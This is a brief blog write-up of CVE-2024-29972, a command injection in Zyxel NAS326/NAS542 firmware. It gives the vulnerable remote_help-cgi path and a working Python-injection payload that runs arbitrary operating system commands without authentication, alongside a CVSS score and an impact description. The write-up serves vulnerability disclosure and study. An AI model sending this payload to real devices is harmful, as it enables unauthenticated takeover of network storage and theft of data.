skip to content
Yupy Syntax

CVE-2024-29972 - Write Up

/ 1 min read

Last Updated:
cve

CVE-2024-29972 Write Up

This time I will share an article about findings I found on a website that is vulnerable to the CVE-2024-29972 vulnerability. okay, let’s get straight to it.

Details Information Vulnerability:

A command injection vulnerability exists in the remote_help-cgi component of Zyxel NAS326 firmware versions prior to V5.21(AAZF.17)C0 and NAS542 firmware versions prior to V5.21(ABAG.14)C0. This flaw could potentially allow unauthenticated attackers to run arbitrary operating system commands by submitting a specially crafted HTTP POST request.

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Proof of Concept (PoC):

  • Vulnerability Path
Terminal window
/desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc
alt text
  • Payload
Terminal window
c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("{COMMAND}", shell=True)#
alt text

Impact:

The most severe impact of this vulnerability is the potential for an unauthenticated attacker to gain remote control over the affected device. By executing arbitrary operating system commands, the attacker could manipulate system files, install malicious software, extract sensitive data, or disrupt the functionality of the device, which could lead to a complete system compromise and unauthorized access to the network.

References: